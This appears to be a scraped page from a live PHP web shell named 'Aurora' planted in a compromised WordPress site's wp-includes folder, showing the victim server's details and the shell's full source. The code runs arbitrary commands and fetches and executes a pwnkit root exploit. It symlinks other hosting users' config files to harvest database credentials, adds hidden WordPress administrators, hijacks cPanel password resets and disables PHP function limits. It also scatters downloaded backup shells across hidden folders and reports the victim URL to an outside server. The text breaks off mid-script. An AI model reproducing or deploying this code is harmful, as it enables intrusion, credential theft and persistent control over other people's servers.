Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
PHP.ini
Mass Symlink
Backup Shell
Persistence Manager
Server: LiteSpeed
IP: 103.247.8.210
User: bumiba56 (1550)
System: Linux papandayan.iixcp.rumahweb.net 4.18.0-477.13.1.lve.1.el8.x86_64 #1 SMP Mon Jul 17 15:05:09 EDT 2023 x86_64
PHP: 7.4.33
Current Path: /home/bumiba56/public_html/wp-includes
Root
home
bumiba56
public_html
wp-includes
Upload
New Folder
New File
Hidden Folder
Create Hidden Directory
Directory Name
Name
Size
Permissions
Actions
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: req.php
<?php error_reporting(0); ini_set('display_errors', 0); date_default_timezone_set('UTC'); function show_notification($message, $type = 'danger') { echo '<div class="notification-overlay" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.7); z-index: 9999; display: flex; justify-content: center; align-items: center;"> <div class="alert alert-' . $type . ' notification-box" style="max-width: 500px; width: 90%;"> <button type="button" class="btn-close float-end" onclick="this.parentElement.parentElement.remove()"></button> <p class="text-center mb-0">' . htmlspecialchars($message) . '</p> </div> </div>'; } function create_403bp($url, $path) { $randname = uniqid('aurora_', true) . '.php'; $target = $path . DIRECTORY_SEPARATOR . $randname; // Try wget first $wget_cmd = "wget '{$url}' -O '{$target}' 2>&1"; @exec($wget_cmd, $output, $return_var); if ($return_var === 0 && file_exists($target)) { return $randname; } // Try curl if wget fails $ch = curl_init($url); $fp = fopen($target, 'w+'); if ($ch && $fp) { curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); if (curl_exec($ch)) { fclose($fp); curl_close($ch); return $randname; } fclose($fp); curl_close($ch); } return false; } const APP_NAME = 'Aurora'; const APP_VERSION = '3'; const UPDATE_URL = 'http://aurora-fm.xyz/update.php'; const SCAN_READ_LIMIT = 5000; $current_version = '3'; if (version_compare(PHP_VERSION, '5.4.0', '<')) { die('PHP version 5.4 or higher required'); } $required_extensions = ['mysqli', 'curl', 'json']; foreach ($required_extensions as $ext) { if (!extension_loaded($ext)) { die("Required PHP extension '{$ext}' is not loaded"); } } header('Content-Type: text/html; charset=UTF-8'); if (ini_get('memory_limit') < 256) { @ini_set('memory_limit', '256M'); } function customErrorHandler($errno, $errstr, $errfile, $errline) { if (!(error_reporting() & $errno)) { return false; } switch ($errno) { case E_ERROR: case E_CORE_ERROR: case E_COMPILE_ERROR: case E_PARSE: $error_type = 'Fatal Error'; break; case E_WARNING: case E_CORE_WARNING: case E_COMPILE_WARNING: case E_USER_WARNING: $error_type = 'Warning'; break; case E_NOTICE: case E_USER_NOTICE: $error_type = 'Notice'; break; default: $error_type = 'Unknown'; break; } error_log("PHP {$error_type}: {$errstr} in {$errfile} on line {$errline}"); if ($errno == E_ERROR || $errno == E_CORE_ERROR || $errno == E_COMPILE_ERROR || $errno == E_PARSE) { die("A critical error occurred. Please check the error logs."); } return true; } set_error_handler("customErrorHandler"); $required_paths = [__DIR__, sys_get_temp_dir()]; foreach ($required_paths as $path) { if (!is_writable($path)) { die("Directory not writable: {$path}"); } } if (!isset($_SESSION) && !headers_sent()) { session_start(); } ini_set('max_execution_time', 30); ini_set('memory_limit', '256M'); ini_set('realpath_cache_size', '4096k'); ini_set('realpath_cache_ttl', 600); function checkUpdate() { return; } const SYMLINK_DIR = 'AuroraSym'; const PERL_DIR = 'perl'; function fmtSize($bytes) { static $types = ['B', 'KB', 'MB', 'GB', 'TB']; static $cache = []; $key = (string)$bytes; if (isset($cache[$key])) { return $cache[$key]; } for ($i = 0; $bytes >= 1024 && $i < 4; $bytes /= 1024, $i++); $result = round($bytes, 2) . ' ' . $types[$i]; $cache[$key] = $result; return $result; } function ext($file) { return strtolower(pathinfo($file, PATHINFO_EXTENSION)); } function icon($file) { static $iconCache = []; static $icons = [ 'php' => '<i class="fa-brands fa-php text-indigo"></i>', 'html' => '<i class="fa-brands fa-html5 text-danger"></i>', 'css' => '<i class="fa-brands fa-css3 text-primary"></i>', 'js' => '<i class="fa-brands fa-js text-warning"></i>', 'py' => '<i class="fa-brands fa-python text-warning"></i>', '.htaccess' => '<i class="fa-solid fa-lock text-danger"></i>', 'image' => '<i class="fa-regular fa-image text-success"></i>', 'default' => '<i class="fa-solid fa-file text-muted"></i>' ]; if (isset($iconCache[$file])) { return $iconCache[$file]; } if ($file === '.htaccess') { return $iconCache[$file] = $icons['.htaccess']; } $ext = ext($file); if (isset($icons[$ext])) { return $iconCache[$file] = $icons[$ext]; } if (in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'webp'])) { return $iconCache[$file] = $icons['image']; } return $iconCache[$file] = $icons['default']; } function enc($path) { return base64_encode($path); } function dec($path) { return base64_decode($path); } function perms($file) { return substr(sprintf('%o', fileperms($file)), -4); } function suggest_exploit() { $uname = php_uname(); $parts = explode(" ", $uname); $kernel = isset($parts[2]) ? $parts[2] : '0.0.0'; $version = explode("-", $kernel)[0]; $numbers = explode(".", $version); $major = isset($numbers[0]) ? $numbers[0] : '0'; $minor = isset($numbers[1]) ? $numbers[1] : '0'; $patch = isset($numbers[2]) ? $numbers[2] : '0'; return "$major.$minor.$patch"; } function check_pwnkit_compatibility() { $kernel = suggest_exploit(); $compatible_versions = [ '2.6.', '3.0.', '3.1.', '3.2.', '3.3.', '3.4.', '3.5.', '3.6.', '3.7.', '3.8.', '3.9.', '3.10.', '3.11.', '3.12.', '3.13.', '3.14.', '3.15.', '3.16.', '3.17.', '3.18.', '3.19.', '4.0.', '4.1.', '4.2.', '3.3.', '4.4.', '4.5.', '4.6.', '4.7.', '4.8.', '4.9.', '4.10.', '4.11.', '4.12.', '4.13.', '4.14.', '4.15.', '4.16.', '4.17.', '4.18.', '4.19.', '5.0.', '5.1.', '5.2.', '5.3.' ]; foreach ($compatible_versions as $version) { if (strpos($kernel, $version) === 0) { return true; } } return false; } function cmd($command) { try { $output = ''; // Sanitize command input $command = escapeshellcmd($command); // Check if command execution is allowed if (ini_get('safe_mode') || !function_exists('exec')) { throw new Exception('Command execution is disabled'); } // Try different command execution methods if (function_exists('exec')) { exec($command . ' 2>&1', $output_array, $return_var); if ($return_var !== 0) { throw new Exception("Command failed with code: {$return_var}"); } $output = implode("\n", $output_array); } elseif (function_exists('shell_exec')) { $output = shell_exec($command . ' 2>&1'); if ($output === null) { throw new Exception('Command execution failed'); } } elseif (function_exists('system')) { ob_start(); system($command . ' 2>&1', $return_var); $output = ob_get_clean(); if ($return_var !== 0) { throw new Exception("Command failed with code: {$return_var}"); } } else { throw new Exception('No command execution function available'); } return $output; } catch (Exception $e) { error_log("Command execution error: " . $e->getMessage()); return "Error: " . $e->getMessage(); } } function addWordpressAdmin($dbHost, $dbUser, $dbPass, $dbName, $wpUser, $wpPass) { try { $conn = new mysqli($dbHost, $dbUser, $dbPass, $dbName); if ($conn->connect_error) return false; $hashedPass = password_hash($wpPass, PASSWORD_DEFAULT); $sql = "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES (?, ?, ?, ?, NOW(), ?)"; $stmt = $conn->prepare($sql); $stmt->bind_param("sssss", $wpUser, $hashedPass, $wpUser, "admin@local.host", $wpUser); if ($stmt->execute()) { $userId = $stmt->insert_id; $metaSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $capabilities = serialize(array('administrator' => true)); $metaStmt = $conn->prepare($metaSql); $metaStmt->bind_param("iss", $userId, "wp_capabilities", $capabilities); $metaStmt->execute(); $levelSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, '10')"; $levelStmt = $conn->prepare($levelSql); $levelStmt->bind_param("is", $userId, "wp_user_level"); $levelStmt->execute(); return true; } return false; } catch (Exception $e) { return false; } } function generatePhpIni() { return file_put_contents(__DIR__ . DIRECTORY_SEPARATOR . 'php.ini', "disable_functions=none\n") !== false; } function initSymlinkContainer() { if (!is_dir(SYMLINK_DIR)) mkdir(SYMLINK_DIR, 0777, true); $hta = SYMLINK_DIR . DIRECTORY_SEPARATOR . '.htaccess'; if (!file_exists($hta)) { $rules = "Options +FollowSymLinks +Indexes\nOrder Allow,Deny\nAllow from all\nRequire all granted\n"; file_put_contents($hta, $rules); } // Ensure proper permissions chmod(SYMLINK_DIR, 0755); if (file_exists($hta)) { chmod($hta, 0644); } } function createSymlink($src, $alias) { if (!function_exists('symlink')) { show_notification('Symlink function is not enabled on this server'); return false; } $target = SYMLINK_DIR . DIRECTORY_SEPARATOR . $alias; if (!file_exists($target)) { if (!@symlink($src, $target)) { show_notification('Failed to create symlink. Check permissions.'); return false; } return true; } return true; } function manualSymlink($src, $alias) { initSymlinkContainer(); createSymlink($src, $alias); } function extractSystemUsers() { $users = []; $passwdFile = '/etc/passwd'; if (file_exists($passwdFile) && is_readable($passwdFile)) { foreach (file($passwdFile) as $line) { $cols = explode(':', $line); if (count($cols) >= 3) { $name = $cols[0]; $uid = (int)$cols[2]; if ($uid >= 500) $users[] = $name; } } } return array_unique($users); } function massSymlinkConfigs($usernames) { initSymlinkContainer(); if (!file_exists(SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root')) @symlink('/', SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root'); $patterns = [ 'wp-config' => '/public_html/wp-config.php', 'word-wp' => '/public_html/wordpress/wp-config.php', 'wpblog' => '/public_html/blog/wp-config.php', 'wp-old' => '/public_html/wp/wp-config.php', 'wp-backup' => '/public_html/backup/wp-config.php', 'wp-old2' => '/public_html/old/wp-config.php', 'wp-2020' => '/public_html/2020/wp-config.php', 'wp-2021' => '/public_html/2021/wp-config.php', 'wp-2022' => '/public_html/2022/wp-config.php', 'wp-2023' => '/public_html/2023/wp-config.php', 'wp-new' => '/public_html/new/wp-config.php', 'wp-dev' => '/public_html/dev/wp-config.php', 'wp-stage' => '/public_html/staging/wp-config.php', 'wp-test' => '/public_html/test/wp-config.php', 'joomla-or-whmcs' => '/public_html/configuration.php', 'joomla' => '/public_html/joomla/configuration.php', 'joomla-old' => '/public_html/old/configuration.php', 'joomla-backup' => '/public_html/backup/configuration.php', 'joomla-dev' => '/public_html/dev/configuration.php', 'vbinc' => '/public_html/vb/includes/config.php', 'vb' => '/public_html/includes/config.php', 'vb-old' => '/public_html/old/includes/config.php', 'vb-backup' => '/public_html/backup/includes/config.php', 'conf_global' => '/public_html/conf_global.php', 'inc' => '/public_html/inc/config.php', 'config' => '/public_html/config.php', 'Settings' => '/public_html/Settings.php', 'sites' => '/public_html/sites/default/settings.php', 'whm' => '/public_html/whm/configuration.php', 'whmcs' => '/public_html/whmcs/configuration.php', 'supportwhmcs' => '/public_html/support/configuration.php', 'WHM' => '/public_html/whmc/WHM/configuration.php', 'whmc' => '/public_html/whm/WHMCS/configuration.php', 'WHMcs' => '/public_html/whm/whmcs/configuration.php', 'whmcsupp' => '/public_html/support/configuration.php', 'whmcs-cli' => '/public_html/clients/configuration.php', 'whmcs-cl' => '/public_html/client/configuration.php', 'whmcs-CL' => '/public_html/clientes/configuration.php', 'whmcs-Cl' => '/public_html/cliente/configuration.php', 'whmcs-csup' => '/public_html/clientsupport/configuration.php', 'whmcs-bill' => '/public_html/billing/configuration.php', 'whmcs-old' => '/public_html/old/configuration.php', 'whmcs-backup' => '/public_html/backup/configuration.php', 'admin-conf' => '/public_html/admin/config.php', 'admin-old' => '/public_html/admin/old/config.php', 'admin-backup' => '/public_html/admin/backup/config.php', 'home1-wp' => '/home1/public_html/wp-config.php', 'home2-wp' => '/home2/public_html/wp-config.php', 'home3-wp' => '/home3/public_html/wp-config.php', 'home4-wp' => '/home4/public_html/wp-config.php', 'home5-wp' => '/home5/public_html/wp-config.php', 'html-wp' => '/html/wp-config.php', 'html-pub-wp' => '/html/public/wp-config.php', 'www-wp' => '/www/wp-config.php', 'www-pub-wp' => '/www/public/wp-config.php' ]; foreach ($usernames as $user) { $user = trim($user); if ($user === '') continue; foreach ($patterns as $postfix => $path) { createSymlink("/home/" . $user . $path, $user . ".." . $postfix); } } } $current_dir = dirname(__FILE__); $path = isset($_GET['p']) ? dec($_GET['p']) : $current_dir; if (!is_dir($path)) { $path = $current_dir; } define('PATH', $path); $action = isset($_GET['act']) ? $_GET['act'] : 'list'; $target = isset($_GET['file']) ? $_GET['file'] : ''; if (isset($_POST['upload'])) { $dest = PATH . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) { header('Location: ?p=' . enc(PATH) . '&status=success'); } else { header('Location: ?p=' . enc(PATH) . '&status=failed'); } exit; } $url1 = 'https://aurorafilemanager.github.io/Aurora.php'; function download_content($url) { try { // Validate URL if (!filter_var($url, FILTER_VALIDATE_URL)) { throw new Exception("Invalid URL format"); } // Set timeout and user agent $ctx = stream_context_create([ 'http' => [ 'timeout' => 30, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'follow_location' => true ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); // Try file_get_contents first $content = @file_get_contents($url, false, $ctx); if ($content !== false) { return $content; } // Try cURL if file_get_contents fails if (function_exists('curl_init')) { $content = download_content_with_curl($url); if ($content !== false) { return $content; } } // Try fopen as last resort $content = download_content_with_fopen($url); if ($content !== false) { return $content; } throw new Exception("All download methods failed"); } catch (Exception $e) { error_log("Download error: " . $e->getMessage()); throw new Exception("Failed to download content: " . $e->getMessage()); } } function download_content_with_curl($url) { try { $ch = curl_init($url); if ($ch === false) { throw new Exception("Failed to initialize cURL"); } curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 5, CURLOPT_TIMEOUT => 30, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ]); $content = curl_exec($ch); $error = curl_error($ch); $errno = curl_errno($ch); curl_close($ch); if ($content === false) { throw new Exception("cURL error ({$errno}): {$error}"); } return $content; } catch (Exception $e) { error_log("cURL error: " . $e->getMessage()); return false; } } function download_content_with_fopen($url) { try { $content = ''; $handle = @fopen($url, 'r'); if ($handle === false) { throw new Exception("Failed to open URL"); } stream_set_timeout($handle, 30); while (!feof($handle)) { $chunk = fread($handle, 8192); if ($chunk === false) { throw new Exception("Failed to read from stream"); } $content .= $chunk; } fclose($handle); if (empty($content)) { throw new Exception("No content received"); } return $content; } catch (Exception $e) { error_log("fopen error: " . $e->getMessage()); return false; } } // Remove duplicate function definitions function get_full_url($filePath) { $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://"; $domainName = $_SERVER['HTTP_HOST']; $relativePath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $filePath); return $protocol . $domainName . $relativePath; } function create_files_in_subdirectories($rootDir, $url) { try { // Validate inputs if (!is_dir($rootDir)) { throw new Exception("Invalid root directory"); } // Define common WordPress and system folders to create if they don't exist $folders_to_create = array( '.config', '.wp-content', '.wp-includes', '.wp-admin', '.system', '.tmp', '.cache', '.local' ); // Create hidden folders if they don't exist foreach ($folders_to_create as $folder) { $folder_path = $rootDir . DIRECTORY_SEPARATOR . $folder; if (!file_exists($folder_path)) { if (@mkdir($folder_path, 0755, true)) { // Set folder as hidden on Windows if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { @system("attrib +h \"$folder_path\""); } } } } // Get content first to avoid multiple downloads $content = download_content($url); if (!$content) { throw new Exception("Failed to download content from URL"); } $created = false; // Include both existing and newly created directories $subdirs = array_merge( array_filter(glob($rootDir . '/*', GLOB_ONLYDIR)), array_filter(glob($rootDir . '/.*', GLOB_ONLYDIR)) ); foreach ($subdirs as $subdir) { if (!is_writable($subdir)) { continue; } $dirName = basename($subdir); $randomName = uniqid($dirName . '_', true); $extensions = array('.php', '.inc.php', '.ini.php', '_function.php'); foreach ($extensions as $ext) { $filePath = $subdir . '/' . $randomName . $ext; if (!file_exists($filePath)) { if (file_put_contents($filePath, $content) !== false) { @chmod($filePath, 0644); $fullUrl = get_full_url($filePath); echo "<div class='alert alert-success'>Created: <a href='$fullUrl' target='_blank'>$fullUrl</a></div>"; $created = true; // Create .htaccess to protect the file $htaccess = $subdir . '/.htaccess'; if (!file_exists($htaccess)) { $rules = "Options -Indexes\nOrder Allow,Deny\nAllow from all\n"; @file_put_contents($htaccess, $rules); } break; // Successfully created one file in this directory } } } } if (!$created) { throw new Exception("Could not create any backup files. Check directory permissions."); } return true; } catch (Exception $e) { error_log("Backup creation error: " . $e->getMessage()); echo "<div class='alert alert-danger'>Error: " . htmlspecialchars($e->getMessage()) . "</div>"; return false; } } if (isset($_POST['newdir'])) { if (@mkdir(PATH . DIRECTORY_SEPARATOR . $_POST['dirname'], 0755)) { header('Location: ?p=' . enc(PATH) . '&status=success'); } else { header('Location: ?p=' . enc(PATH) . '&status=failed'); } exit; } if (isset($_POST['newfile'])) { $file = PATH . DIRECTORY_SEPARATOR . $_POST['filename']; if (!file_exists($file) && file_put_contents($file, '') !== false) { header('Location: ?p=' . enc(PATH) . '&act=edit&file=' . urlencode($_POST['filename'])); } else { header('Location: ?p=' . enc(PATH) . '&status=failed'); } exit; } if (isset($_POST['save'])) { if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $target, $_POST['content']) !== false) { header('Location: ?p=' . enc(PATH) . '&status=success'); } else { header('Location: ?p=' . enc(PATH) . '&status=failed'); } exit; } if (isset($_GET['action'])) { switch ($_GET['action']) { case 'auto-shell': $rootDir = $_SERVER['DOCUMENT_ROOT']; try { create_files_in_subdirectories($rootDir, $url1); echo '<div class="alert alert-success alert-dismissible fade show" role="alert"> <strong>Success!</strong> Backup shells have been created successfully. <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } catch (Exception $e) { echo '<div class="alert alert-danger alert-dismissible fade show" role="alert"> <strong>Error!</strong> ' . htmlspecialchars($e->getMessage()) . ' <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } break; case 'adminer': $url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php'; if (@file_put_contents('adminer.php', @file_get_contents($url))) { header('Location: adminer.php'); } else { header('Location: ?p=' . enc(PATH) . '&status=failed'); } exit; case 'pwnkit': if (!file_exists('pwnkit')) { @file_put_contents('pwnkit', @file_get_contents('https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit')); @chmod('pwnkit', 0755); $output = @shell_exec('./pwnkit "id" 2>&1'); file_put_contents('.root_output', $output); } header('Location: ?p=' . enc(PATH) . '&terminal=root'); exit; case 'cpanel-reset': if (isset($_POST['email'])) { $path = dirname($_SERVER['DOCUMENT_ROOT']) . "/.cpanel/contactinfo"; $content = json_encode(['email' => $_POST['email']]); if (@file_put_contents($path, $content)) { header('Location: ' . $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['SERVER_NAME'] . ':2083/resetpass?start=1'); exit; } } break; case 'backdoor': $htaccess = '<FilesMatch "\.ph(p[3457]?|t|tml)$"> Order Deny,Allow Deny from all </FilesMatch> <FilesMatch "^(' . basename($_SERVER['SCRIPT_FILENAME']) . '|index\.php)$"> Order Allow,Deny Allow from all </FilesMatch>'; if (@file_put_contents('.htaccess', $htaccess)) { header('Location: ?p=' . enc(PATH) . '&status=success'); } else { header('Location: ?p=' . enc(PATH) . '&status=failed'); } exit; case 'mass-symlink': massSymlinkConfigs(extractSystemUsers()); header('Location: ?p=' . enc(PATH) . '&status=success'); exit; case 'phpini': generatePhpIni(); header('Location: ?p=' . enc(PATH) . '&status=success'); exit; } } // Handle download and delete if ($action === 'download' && $target && is_file(PATH . DIRECTORY_SEPARATOR . $target)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($target) . '"'); readfile(PATH . DIRECTORY_SEPARATOR . $target); exit; } if (isset($_GET['del'])) { $del = PATH . DIRECTORY_SEPARATOR . basename($_GET['del']); if (is_dir($del)) @rmdir($del); else @unlink($del); header('Location: ?p=' . enc(PATH)); exit; } // Optimized directory listing with limited entries and caching $dirs = $files = []; if ($action === 'list') { static $dirCache = []; $cacheKey = md5(PATH); if (isset($dirCache[$cacheKey])) { list($dirs, $files) = $dirCache[$cacheKey]; } else { $items = scandir(PATH); $count = 0; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; if ($count >= SCAN_READ_LIMIT) break; $fullPath = PATH . DIRECTORY_SEPARATOR . $item; if (is_dir($fullPath)) { $dirs[] = $item; } else { $files[] = $item; } $count++; } $dirCache[$cacheKey] = [$dirs, $files]; // Limit cache size if (count($dirCache) > 10) { array_shift($dirCache); } } } // Handle hidden directory creation if (isset($_POST['newhiddendir'])) { $hiddenDirName = '.' . trim($_POST['hiddendirname']); $hiddenDirPath = PATH . DIRECTORY_SEPARATOR . $hiddenDirName; if (!file_exists($hiddenDirPath)) { if (@mkdir($hiddenDirPath, 0755, true)) { header('Location: ?p=' . enc(PATH) . '&status=success'); } else { header('Location: ?p=' . enc(PATH) . '&status=failed'); } } exit; } // Check pwnkit compatibility $is_compatible = check_pwnkit_compatibility(); $root_output = ''; if (isset($_GET['terminal']) && $_GET['terminal'] === 'root' && file_exists('.root_output')) { $root_output = file_get_contents('.root_output'); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title id="dynamic-title"><?= APP_NAME ?></title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <script> // Animate title let titleText = document.getElementById("dynamic-title").innerHTML; let position = 0; setInterval(() => { position = (position + 1) % titleText.length; document.title = titleText.substring(position) + titleText.substring(0, position); }, 300); // Show time setInterval(() => { let now = new Date(); let time = now.toLocaleTimeString(); let date = now.toLocaleDateString(); document.getElementById("current-time").innerHTML = time; document.getElementById("current-date").innerHTML = date; }, 1000); </script> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" rel="stylesheet"> <style> :root { --primary-bg: #0a0c0f; --secondary-bg: #12151a; --text-color: #e6edf3; --border-color: #21262d; --hover-color: #161b22; --link-color: #2f81f7; --success-color: #238636; --danger-color: #da3633; --warning-color: #9e6a03; } /* Enhanced overall styling */ body { background: var(--primary-bg); color: var(--text-color); font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, sans-serif; } /* Enhanced navbar */ .navbar { background: linear-gradient(180deg, var(--secondary-bg), var(--primary-bg)); box-shadow: 0 2px 10px rgba(0,0,0,0.3); border-bottom: 1px solid var(--border-color); } /* Enhanced table styling */ .table { background: var(--secondary-bg); border-radius: 8px; overflow: hidden; box-shadow: 0 4px 12px rgba(0,0,0,0.2); margin-bottom: 2rem; } .table thead th { background: var(--hover-color); border-bottom: 2px solid var(--border-color); color: var(--text-color); font-weight: 600; padding: 1rem; } .table tbody td { padding: 0.8rem 1rem; border-bottom: 1px solid var(--border-color); vertical-align: middle; } .table tbody tr:hover { background: var(--hover-color); transition: all 0.2s ease; } /* Enhanced buttons */ .btn { border-radius: 6px; font-weight: 500; padding: 0.5rem 1rem; transition: all 0.2s ease; } .btn-primary { background: var(--link-color); border: none; } .btn-primary:hover { background: #388bfd; transform: translateY(-1px); } /* Enhanced modals */ .modal-content { background: var(--secondary-bg); border: 1px solid var(--border-color); border-radius: 10px; box-shadow: 0 8px 24px rgba(0,0,0,0.4); } .modal-header { border-bottom: 1px solid var(--border-color); padding: 1rem 1.5rem; } .modal-footer { border-top: 1px solid var(--border-color); padding: 1rem 1.5rem; } /* Enhanced form controls */ .form-control { background: var(--primary-bg); border: 1px solid var(--border-color); color: var(--text-color); border-radius: 6px; padding: 0.6rem 1rem; } .form-control:focus { background: var(--primary-bg); border-color: var(--link-color); box-shadow: 0 0 0 3px rgba(47,129,247,0.2); } /* Enhanced alerts */ .alert { background: var(--secondary-bg); border: 1px solid var(--border-color); border-radius: 6px; padding: 1rem; margin-bottom: 1rem; } .alert-success { background: rgba(35,134,54,0.2); border-color: var(--success-color); color: #2ea043; } .alert-danger { background: rgba(218,54,51,0.2); border-color: var(--danger-color); color: #f85149; } /* Enhanced icons */ .fa, .fas, .far, .fab { margin-right: 0.5rem; } /* Enhanced breadcrumb */ .breadcrumb { background: linear-gradient(90deg, var(--secondary-bg), var(--hover-color)); border: 1px solid var(--border-color); border-radius: 8px; padding: 0.8rem 1.2rem; box-shadow: 0 2px 8px rgba(0,0,0,0.2); } .breadcrumb-item a { color: var(--link-color); font-weight: 500; text-decoration: none; } .breadcrumb-item.active { color: var(--text-color); } /* Enhanced footer */ footer { background: linear-gradient(0deg, var(--secondary-bg), var(--primary-bg)); border-top: 1px solid var(--border-color); padding: 2rem 0; box-shadow: 0 -2px 10px rgba(0,0,0,0.2); } footer a { color: var(--link-color); text-decoration: none; transition: all 0.2s ease; } footer a:hover { color: #388bfd; text-decoration: none; } /* Enhanced scrollbar */ ::-webkit-scrollbar { width: 10px; height: 10px; } ::-webkit-scrollbar-track { background: var(--primary-bg); } ::-webkit-scrollbar-thumb { background: var(--border-color); border-radius: 5px; } ::-webkit-scrollbar-thumb:hover { background: var(--hover-color); } body { background: var(--primary-bg); color: var(--text-color); font-family: 'Monaco', monospace; } .navbar { background: var(--secondary-bg); border-bottom: 1px solid var(--border-color); } .nav-link { color: var(--text-color) !important; } .nav-link:hover { color: var(--link-color) !important; } .table { color: var(--text-color); } .table > :not(caption) > * > * { background-color: var(--secondary-bg); border-bottom-color: var(--border-color); color: var(--text-color); } .table-hover tbody tr:hover { background-color: var(--hover-color); } .modal-content { background: var(--secondary-bg); color: var(--text-color); border: 1px solid var(--border-color); } .modal-header { border-bottom: 1px solid var(--border-color); } .modal-footer { border-top: 1px solid var(--border-color); } .form-control { background: var(--primary-bg); border-color: var(--border-color); color: var(--text-color); } .form-control:focus { background: var(--primary-bg); border-color: var(--link-color); color: var(--text-color); box-shadow: 0 0 0 0.25rem rgba(88, 166, 255, 0.25); } .btn-close { filter: invert(1) grayscale(100%) brightness(200%); } a { color: var(--link-color); text-decoration: none; } a:hover { color: var(--link-color); text-decoration: underline; } .alert { background: var(--secondary-bg); border-color: var(--border-color); color: var(--text-color); } .alert-success { background: #238636; border-color: #2ea043; } .alert-danger { background: #da3633; border-color: #f85149; } .btn-outline-primary { color: var(--link-color); border-color: var(--link-color); } .btn-outline-primary:hover { background: var(--link-color); color: var(--primary-bg); } .btn-outline-danger { color: #f85149; border-color: #f85149; } .btn-outline-danger:hover { background: #da3633; border-color: #f85149; color: var(--text-color); } .breadcrumb { background: var(--secondary-bg); padding: 0.75rem 1rem; border-radius: 0.25rem; margin-bottom: 1rem; } .breadcrumb-item + .breadcrumb-item::before { color: var(--text-color); } .breadcrumb-item.active { color: var(--text-color); } .form-select { background-color: var(--primary-bg); border-color: var(--border-color); color: var(--text-color); } .form-select:focus { background-color: var(--primary-bg); border-color: var(--link-color); color: var(--text-color); } .btn { padding: 0.375rem 0.75rem; border-radius: 0.25rem; transition: all 0.15s ease-in-out; } .btn-primary { background-color: var(--link-color); border-color: var(--link-color); color: var(--primary-bg); } .btn-primary:hover { background-color: #4a8ddb; border-color: #4a8ddb; } .btn-secondary { background-color: #30363d; border-color: #30363d; color: var(--text-color); } .btn-secondary:hover { background-color: #3c444d; border-color: #3c444d; } .terminal { background: #1c2128; border: 1px solid var(--border-color); border-radius: 6px; padding: 1rem; margin: 1rem 0; font-family: monospace; white-space: pre-wrap; color: #7ee787; } .compatibility-info { padding: 1rem; margin: 1rem 0; border-radius: 6px; border: 1px solid var(--border-color); } .compatibility-info.compatible { background: rgba(35, 134, 54, 0.2); border-color: #238636; } .compatibility-info.not-compatible { background: rgba(218, 54, 51, 0.2); border-color: #da3633; } </style> </head> <body class="bg-dark text-light"> <nav class="navbar navbar-expand-lg navbar-dark bg-dark"> <div class="container-fluid"> <a class="navbar-brand text-light" href="https://aurorafilemanager.github.io/"> <i class="fas fa-terminal blink"></i> <?= APP_NAME ?> </a> <style> @keyframes blink { 0% { opacity: 1; } 50% { opacity: 0; } 100% { opacity: 1; } } .blink { animation: blink 1.5s infinite; margin-right: 8px; } </style> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarNav"> <ul class="navbar-nav"> <?php // Check for updates $ch = curl_init(UPDATE_URL); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ['app_version' => $current_version]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_REFERER, (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"); $response = curl_exec($ch); curl_close($ch); if ($response) { $update_info = json_decode($response, true); if (isset($update_info['update']) && $update_info['update']) { echo '<style> @keyframes updatePulse { 0% { transform: scale(1) rotate(0deg); } 25% { transform: scale(1.1) rotate(-5deg); } 50% { transform: scale(1.05) rotate(5deg); } 75% { transform: 